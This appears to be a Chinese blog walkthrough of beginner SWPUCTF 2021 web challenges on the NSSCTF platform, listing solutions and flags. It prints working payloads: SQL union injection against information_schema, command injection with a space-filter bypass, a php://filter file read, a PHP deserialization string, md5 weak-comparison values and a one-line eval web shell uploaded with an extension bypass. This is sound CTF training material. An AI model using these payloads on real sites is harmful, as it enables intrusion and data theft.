[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

已于 2023-05-04 15:10:14 修改
阅读量1.7k 收藏 16
点赞数 12
分类专栏: CTF 文章标签: NSSCTF 刷题记录wp FLAG Web PHP
于 2023-04-17 09:20:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/130184133
版权

[SWPUCTF] 2021 新生赛(NSSCTF刷题记录wp)

NSSCTF平台:https://www.nssctf.cn/

[SWPUCTF 2021 新生赛]gift_F12

直接查看源代码F12flag即可。
在这里插入图片描述

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[第五空间 2021]签到题

NSSCTF{welcometo5space}

[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

所以为满足if条件,输出flag,构造Payload:

get:json={"x":"wllm"}
post:id=wllmNB

在这里插入图片描述

NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}

[SWPUCTF 2021 新生赛]easy_md5

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>

这里就是md5碰撞了 这里要求ab输入值不相同,md5加密后的值弱类型相等,就想到了0e的科学计数法

这里需要让password != name 又需要让他们的md5值相等,所以我们需要md5绕过 这里可以用bphackbar

QNKCDZO,s878926199a

在这里插入图片描述
在这里插入图片描述

NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}

[SWPUCTF 2021 新生赛]caidao

直接告诉了密码 蚁剑直接连 flag在根目录下面。
在这里插入图片描述
在这里插入图片描述

NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}

[SWPUCTF 2021 新生赛]include

在这里插入图片描述

Payload:?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
在这里插入图片描述

NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}

[SWPUCTF 2021 新生赛]easyrce

在这里插入图片描述

?url=system("ls /");  #发现了 flllllaaaaaaggggggg

在这里插入图片描述
在这里插入图片描述

NSSCTF{4ddfeb4b-a30e-42a9-8bf4-f8a480a8b083}

[SWPUCTF 2021 新生赛]easy_sql

在这里插入图片描述
这里告诉我们了传入的参数是wllm 发现有报错,说明存在注入点 存在字符型注入 用order by 查询字段数,查得字段数为3输入4就报错

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

?wllm=-1' union select 1,2,3 --+  ##-1  一个负数不存在的id值来触发报错

在这里插入图片描述

-1' union select 1,2,database(); --+  ##爆破数据库

在这里插入图片描述

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+  #爆破表

在这里插入图片描述
这里有两个表test_tbuserstables的字段替换成column字段先看test_tb

wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+

在这里插入图片描述

-1' union select 1,2,group_concat(id,flag) from test_tb --+ #查询

在这里插入图片描述

NSSCTF{94713769-163e-4e8d-a310-98e17dd7bd37}

[第五空间 2021]WebFTP

使用御剑扫描后台访问phpinfo.php 搜索FLAG即可。

在这里插入图片描述

在这里插入图片描述

NSSCTF{5d64eb71-b973-4708-a275-8f0cf576990b}

[SWPUCTF 2021 新生赛]babyrce

 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) 
{
    include "../next.php";
}
else
    echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

bp抓包改cookieadmin=1 出现了rasalghul.php进行访问 然后又是代码审计

在这里插入图片描述

 <?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip);
  echo $a;
}
?>

这里是烧过空格 ?url=cat${IFS}/f*
在这里插入图片描述

NSSCTF{4f2323c6-1c66-49d4-98c0-65f184730a7b}

[SWPUCTF 2021 新生赛]Do_you_know_http

在这里插入图片描述
直接抓包然后修改User-Agent:WLLM和本地访问X-Forwarded-For:127.0.0.1 访问/secretttt.php即可得到flag

在这里插入图片描述
在这里插入图片描述

NSSCTF{1c22fbcd-0661-40d6-921c-01b09b3257a6}

[SWPUCTF 2021 新生赛]ez_unserialize

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

这里的考点就是反序列 可以参考大佬文章:https://blog.csdn.net/solitudi/article/details/113588692

Payload:?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

在这里插入图片描述

NSSCTF{1387617d-68fc-4c72-aef2-f6bbafc59ed3}

[SWPUCTF 2021 新生赛]easyupload1.0

在这里插入图片描述
新建一个一句话木马<?php @eval($_POST['shell']);?>格式改为php然后抓包 使用phtml 然后使用WebSell工具连接 发现连接成功!!!

在这里插入图片描述
在这里插入图片描述
然后这个FLAG是假的怎么提交都不对 发现.git提示 尝试写个phpinfo(); 🆗得到FLAG

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

NSSCTF{7022989b-6f80-433c-b625-0e3ab22c0803}

[SWPUCTF 2021 新生赛]easyupload2.0

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

NSSCTF{41784aaa-7609-4a3e-8c92-7d5ea8efb3a9}

在这里插入图片描述

🆗感谢大家观看 这篇就先到这里了,都是些比较入门的题目,希望对刚入门CTF想刷题的小伙伴有帮助感谢大家的支持!

落寞的魚丶
关注
  • 12
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
[SWPUCTF 2021 新生]traditional
03-15
SWPUCTF 2021 新生的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
web刷题总结5(nssctf)
Z052308的博客
05-05 808
伪协议(传入相匹配的字符串和查看文件内容),文件包含,反序列化(to_string函数将类当作字符串从而echo执行命令),使用一些常见playload.show columns from Flag;
NSSCTF刷题笔记web11——[SWPUCTF 2021 新生]easyupload1.0
qq_45692883的博客
01-18 469
修改png后缀为php发现可以上传。直接在内容中写入一句话木马即可。这个用burp抓包会方便很多。访问路径,执行命令即可。
NSSCTF | [SWPUCTF 2021 新生]easyupload1.0
最新发布
2302_80946742的博客
05-19 249
但是这里蚁剑连接后得到的flag是假的,没办法了,只能看看phpinfo里面有没有。使用同样的绕过方式,传入phpinfo.php文件,然后访问。可以看到GIF89a,说明一句话木马已经上传成功了,并且被服务器成功解析执行。接下来我们就可以使用HackBar进行命令执行。可以看到ls命令是有作用的。将ContentType修改为image/jpeg即可成功上传。可以看到右边回显了文件上传成功的路径,我们去访问试试看。直接传一句话木马显然是行不通的。果然,能够搜索到flag
NSSCTF——Web题目1
weixin_54055099的博客
08-25 1099
NSSCTF基础web题目的解题思路
[SWPUCTF 2021 新生]caidao
rev1ve的博客
03-05 1015
[SWPUCTF 2021 新生]caidao
[SWPUCTF 2021 新生]第一波放题(nssctf刷题
weixin_63231007的博客
04-09 8919
[SWPUCTF 2021 新生]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json 待解码的 json string 格式的字符串。 asso
[SWPUCTF 2021 新生]easyupload1.0
wyxlsm的博客
02-26 1779
搜到flag文件 这边我环境关了 就直接说 蚁剑不会用的自行百度 和下载 上传我们发现flag值不对 这是虚拟flag值 然后 我们在。首先你得知道我们的目的是什么 取值flag。这是没有显示的 这里分web的前端和后端 而我们这个一句后端注入 不会显示 我们用蚁剑去连一下。这里我们可以看到这个函数 eval 这个函数是执行括号的语句的 php语句的。把1.jpg换成1.php 因为我们上传php去注入 这边是去识别 得到。这个是我们修改成功 得到的 我们可以去访问这upload/1.php
【CTF】[SWPUCTF 2021 新生]easyupload1.0
西原一点红的博客
06-20 495
响应直接访问,获得flag
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
error message_errormessage_
10-04
这个函数的目的是拥有一个独立于设备的;误差传递函数。报告错误信息;如果小部件是,则使用DIALOG_MESSAGE向用户发送;支持和消息,否则
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[NSSCTF]-Web:[SWPUCTF 2021 新生]easyupload1.0解析(抓包修改文件后缀,在phpinfo找flag
2301_79326813的博客
03-18 364
文件上传,但是会过滤后缀为php,pht,phtml。查看phpinfo,ctrl+f搜索flag。用burpsuite抓包,修改文件后缀。用蚁剑连接,发现flag,但是不对。
nssctf web 入门(6)
qq_61988806的博客
04-17 1203
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
NSSCTFweb刷题记录
fivesheeptree的博客
07-12 321
如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。将json参数的值解码为,从而使得$json['x']的值等于"wllm"。通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组。
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,以及一些特定的符号。如果wllm中包含了这些被过滤的字符,脚本会输出"LTLT说不能用这些奇奇怪怪的符号哦!"。接着,脚本会检查wllm中是否包含字母,如果包含字母,脚本会输出"Ra's Al Ghul说不能用字母哦!"。最后,如果wllm通过了所有的过滤条件,脚本会执行eval函数来执行用户传入的代码。所以,要获取flag,需要构造一个满足所有过滤条件的有效代码。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值